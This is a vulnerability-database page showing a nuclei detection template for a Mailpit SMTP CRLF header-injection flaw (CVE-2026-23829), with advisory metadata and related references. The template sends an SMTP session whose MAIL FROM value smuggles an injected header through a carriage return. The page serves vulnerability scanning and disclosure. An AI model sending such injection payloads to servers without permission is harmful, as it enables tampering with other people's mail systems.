Lucene search
K

Mailpit < 1.28.2 - SMTP CRLF Injection

🗓️ 30 Mar 2026 04:20:59Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 8 Views

Mailpit before 1.28.3 has SMTP CRLF header injection due to vulnerable address validation; upgrade to 1.28.3.

Related
Refs
Code
ReporterTitlePublishedViews
Family
FreeBSD
mail/mailpit -- multiple vulnerabilities
18 Jan 202600:00
freebsd
GithubExploit
Exploit for CVE-2026-23829
28 Jan 202603:28
githubexploit
GithubExploit
Exploit for CVE-2026-23829
19 Feb 202601:47
githubexploit
ATTACKERKB
CVE-2026-23829
18 Jan 202623:23
attackerkb
Circl
CVE-2026-23829
17 Jan 202622:52
circl
CNNVD
Mailpit security vulnerabilities
19 Jan 202600:00
cnnvd
CVE
CVE-2026-23829
18 Jan 202623:23
cve
Cvelist
CVE-2026-23829 Mailpit has SMTP Header Injection via Regex Bypass
18 Jan 202623:23
cvelist
EUVD
EUVD-2026-3297
20 Jan 202617:54
euvd
Tenable Nessus
FreeBSD : mail/mailpit -- multiple vulnerabilities (01f34a27-f560-11f0-bbdc-10ffe07f9334)
20 Jan 202600:00
nessus
Rows per page
id: CVE-2026-23829

info:
  name: Mailpit < 1.28.2 - SMTP CRLF Injection
  author: omarkurt
  severity: medium
  description: |
    Mailpit < 1.28 contains a header injection caused by insufficient regex validation of `RCPT TO` and `MAIL FROM` addresses in the SMTP server, letting attackers inject arbitrary SMTP headers, exploit requires crafted email addresses
  impact: |
    An attacker can inject arbitrary headers into captured emails, corrupt existing headers like the Received header, and generate malformed .eml files. This violates RFC 5321 which forbids control characters in envelope addresses.
  remediation: |
    Upgrade Mailpit to version 1.28.3 or later which updates the regex to explicitly exclude all ASCII control characters (\x00-\x1f) from email addresses.
  reference:
    - https://rosecurify.com/advisories/RO-26-002-mailpit-smtp-header-injection/
    - https://github.com/axllent/mailpit/security/advisories/GHSA-54wq-72mp-cq7c
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-23829
    epss-score: 0.00936
    epss-percentile: 0.76104
    cwe-id: CWE-93
    cpe: cpe:2.3:a:axllent:mailpit:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: axllent
    product: mailpit
    shodan-query: title:"Mailpit"
    fofa-query: title="Mailpit"
  tags: cve,cve2026,tcp,crlf,smtp,mailpit,


tcp:
  - inputs:
      - data: "EHLO {{Hostname}}\r\n"
      - data: "MAIL FROM:<attacker\rX-Pwned:{{randstr}}>\r\n"
      - data: "RCPT TO:<[email protected]>\r\n"
      - data: "DATA\r\n"
      - data: "Subject: Test \r\n\r\nCombined Template Check.\r\n.\r\n"
      - data: "QUIT\r\n"

    host:
      - "{{Hostname}}"
    port: 1025
    read-size: 2048

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "250"

      - type: word
        words:
          - "501"
          - "500"
          - "553"
        negative: true
# digest: 4a0a00473045022100ce0c3524d0a7a42fb43eb80f07843d2da2936541583b8584031b591f9eef9d430220593d73187d2e6bc733158333be1828f7add6681fb73a50c2d21e01edd15d7af7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Jan 2026 12:46Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.15.3
EPSS0.01441
SSVC
8